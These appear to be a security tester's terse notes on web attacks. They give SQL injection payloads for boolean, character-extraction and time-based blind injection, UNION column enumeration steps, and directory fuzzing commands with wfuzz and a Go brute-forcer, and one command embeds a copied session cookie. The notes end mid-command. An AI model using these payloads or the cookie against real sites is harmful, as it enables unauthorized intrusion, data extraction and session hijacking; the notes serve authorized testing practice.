Id=1 AND 1 = 2 -> (False) insert this statement to view the difference in the response with the true one
AND ASCII(SUBSTRING(current_user(),1,1))=112 -> 112 is ASCII 'p'
AND IF(version() like '5%', sleep(10), 'false'))
# BOOLEAN: -> (1- Detect the false query to view the difference with the true one, 2- When you know the false response, find the value letter by letter)
=> SQL INJECTIONS (1- add "NULL" columns until you know how many they have, 2- change the column to know which one is printable, 3- look for the concatenated text "sssssectest")

go run main.go -u -w wordlist.txt -s 200,301 -k -t 100 -v -> -k no certificate check, -v verbose, -t threads

wfuzz with docker (openssl fixed)
docker run -v /media/sf_Shared_VM/SecLists/Discovery/Web-Content/:/mnt/test dominicbreuker/wfuzz:latest -c -z file,/mnt/test/raft-medium-directories-lowercase.txt -hc 404
> copy/paste the cookies from the "to curl" burp option
wfuzz -c -z file,/root/Desktop/Dictionar/all.txt -hc 404 -b "loguser= logpass= hciw=1 hsnu=Pepe ASP.NET_SessionId=yewr3vdm4m1ygm4gxhcizuzm hscid=-1.
wfuzz -c -z file,/media/sf_Shared_vm/Fuzzing\